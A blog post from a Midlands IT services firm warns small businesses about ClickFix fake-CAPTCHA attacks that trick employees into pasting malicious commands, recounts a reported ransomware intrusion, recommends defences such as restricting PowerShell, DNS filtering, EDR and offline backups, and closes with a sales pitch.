There’s a new social engineering trick making the rounds, and it’s catching out even tech-savvy employees. It’s called ClickFix, and it works by convincing people to paste malicious commands into their own computers, completely bypassing your email filters, antivirus, and endpoint protection.
If your team uses the internet (so, everyone), this one’s worth paying attention to.
ClickFix is a social engineering technique that’s been gaining traction since late 2025, and in March 2026, Microsoft and multiple security researchers have linked it to active ransomware campaigns targeting businesses.
Here’s how it works in practice:
The clever part? The malicious command is copied to the clipboard automatically. The employee just has to follow the on-screen instructions and paste it. They think they’re completing a routine verification. In reality, they’ve just handed their machine over to an attacker.
Traditional phishing relies on getting someone to click a dodgy link or open a suspicious attachment. Most employees have been trained to watch for those red flags. ClickFix sidesteps all of that.
It exploits trust in familiar interfaces. Everyone has clicked through a CAPTCHA before. Everyone has seen a “your browser needs updating” message. These prompts feel normal, which is exactly what makes them dangerous.
It bypasses technical defences. Because the user is manually executing the command, your email security gateway never sees it. Your antivirus does not flag it at the point of entry.
It does not require a sophisticated attacker. The ClickFix technique has been packaged and shared across criminal forums. Ransomware affiliates are adopting it because it works and because it is simple to deploy at scale.
This is not theoretical. In the first week of March 2026, security firm MalBeacon published research showing that a ransomware group called Velvet Tempest used ClickFix as their primary method of gaining access to a large organisation. They have been behind attacks using Ryuk, REvil, Conti, BlackCat, and LockBit. Now they are using ClickFix with fake CAPTCHA pages to deploy the Termite ransomware.
The attack played out over 12 days: Day 1, an employee encounters a malicious advert leading to a ClickFix page and pastes a command that downloads malware. Days 2 to 5, attackers quietly explore the network, map Active Directory, and harvest saved passwords from Chrome. Days 6 to 12, additional malware is deployed including the CastleRAT backdoor for persistent remote access.
You might be thinking, “We are a 30-person construction firm in Birmingham, not a Fortune 500 company.” That is exactly why you should pay attention. Ransomware groups increasingly target small and medium-sized businesses because SMBs are less likely to have dedicated security teams, ransom amounts are calibrated to what the business can afford (often 10,000 to 50,000 pounds), SMBs often have weaker backup strategies, and supply chain access matters.
For manufacturing, construction, and engineering firms in the Midlands, the operational impact goes beyond data loss. If your project management systems, CAD files, invoicing, or site communications go down, work stops. Every day of downtime costs real money.
Generic “don’t click suspicious links” training is not enough anymore. Your employees need to know:
Most office workers never need PowerShell or the command prompt. Consider restricting PowerShell execution policies, blocking cmd.exe and PowerShell for standard users, using application whitelisting, and disabling the Windows Run dialog for non-admin users via Group Policy.
ClickFix attacks rely on redirecting victims to malicious domains. DNS filtering services can block known malicious domains before the connection is even made, catching a significant portion of ClickFix infrastructure before the fake CAPTCHA page ever loads.
Modern EDR tools can identify the suspicious command chains that ClickFix attacks use. If you are still relying solely on traditional antivirus, it is time to upgrade. EDR solutions provide the behavioural analysis needed to catch attacks that signature-based tools miss.
Many ClickFix attacks begin with malicious advertisements. Use an ad blocker across company devices, restrict browser extension installation to approved extensions only, and configure browsers to block pop-ups from unknown sites.
Even with all the right defences, no security is 100% effective. Follow the 3-2-1 rule (three copies of data, two different media types, one stored offsite). Test your backups regularly. Keep at least one backup offline or air-gapped. Know your recovery time.
ClickFix is part of a broader trend. Attackers are moving away from purely technical exploits and towards social engineering methods that trick humans into doing the technical work for them. Microsoft’s latest threat intelligence report (6 March 2026) highlighted that threat actors are now using AI to generate more convincing phishing lures and scale their social engineering campaigns.
The takeaway? Technical defences matter, but human awareness is your most important security layer. Firewalls do not help when an employee willingly pastes a command into their own machine.
At Magnetar IT, we help businesses across the Midlands, from manufacturing firms in Coventry to construction companies in Birmingham, build IT environments that can withstand modern threats. With over 10 years of experience and a 98% client satisfaction rate, we combine proactive security with responsive support (89% of issues resolved within one hour).
Whether you need a full security review, endpoint protection upgrades, or just want to know where you stand, get in touch for a no-obligation chat.
Date:
Author: Rafael Macedo